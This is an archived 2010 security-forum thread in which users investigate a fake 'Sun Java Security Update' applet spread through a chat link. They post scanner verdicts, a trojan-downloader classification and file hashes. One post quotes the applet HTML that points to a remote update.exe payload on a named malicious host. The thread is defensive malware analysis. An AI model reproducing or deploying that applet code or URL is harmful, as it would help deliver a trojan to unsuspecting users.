Another Java security question. 'Publisher' field. [Archive]

View Full Version : Another Java security question. 'Publisher' field.

Eagle Creek

November 21st, 2010, 10:10 AM

Hi.

About a week ago I received a chat message from an acquaintance of mine. His chat window also contained a link, which I clicked.

It brought me to a website which launched a Java applet.
http://www.wilderssecurity.com/attachment.php?attachmentid=223568&stc=1&d=1290352126

--
I didn't run the applet, although I almost did. Except for the AVG warning (which at first didn't pop up), I noticed the file was coming from a German website. The Publisher however is "Sun Java MicroSystems", but it wasn't verified. This is pretty likely to mislead users.

Has anyone of you seen this before? Or know someone who might have clicked it?

http://www.wilderssecurity.com/attachment.php?attachmentid=223569&stc=1&d=1290352194

vtol

November 21st, 2010, 10:26 AM

-burnerclan.bu.funpic.de/intern/admin/cp2/index.html-

after a while getting redirected through JS

applet code="Sun_Microsystems_Java_Security_Update_6.class" archive="Sun_Microsystems_Java_Security_Update_6.jar" width="1" height="1">

<param name='file' value="-http://burnerclan.bu.funpic.de/intern/admin/update.exe-">

223573

m00nbl00d

November 21st, 2010, 11:07 AM

LinkScanner does flag it: http://linkscanner.explabs.com/linkscanner/checksite.aspx?NS=ChkOnly&SRC=apps.explabs.com&CS=burnerclan.bu.funpic.de/intern/admin/cp2/index.html

Results by URLVoid: http://www.urlvoid.com/scan/burnerclan.bu.funpic.de

My WOT and TrendMicro Web Reputation flag it.

m00nbl00d

November 21st, 2010, 11:10 AM

-{ Quote: "Hi.

[...]Except for the AVG warning (which at first didn't pop up),[...]" }-

That could be because LinkScanner won't actually scan domain and sub-domains at the same time; it only scans the page you're on, which is why when you got redirected to the index.html page it blocked it.

m00nbl00d

November 21st, 2010, 11:14 AM

-{ Quote: "[...]
applet code="Sun_Microsystems_Java_Security_Update_6.class" archive="Sun_Microsystems_Java_Security_Update_6.jar" width="1" height="1">

<param name='file' value="-http://burnerclan.bu.funpic.de/intern/admin/update.exe-">
[...]" }-

I bet Eagle Creek's LinkScanner is going crazy right now, due to this code. Most likely it is blocking is access to full thread. :D

vtol

November 21st, 2010, 11:20 AM

this may have been an attempt to run code but it fails as the -burnerclan.bu.funpic.de/intern/admin/update.exe- is currently not available at the location

vtol

November 21st, 2010, 02:14 PM

the JS file got classified

Sun_Microsystems_Java_Security_Update_6.class - probably a variant of Win32/TrojanDownloader.Agent.ESKWMEL trojan

MD5 : 3d76ae89d24ece60549f3f7b57ffbc63
SHA1 : c887bd78e3eaed6ec8a47d96abada8ffc70b8374
SHA256: ee9a15dada830f914580e8aaa0ea6191bc63773f53a174774b99a4f816f12c77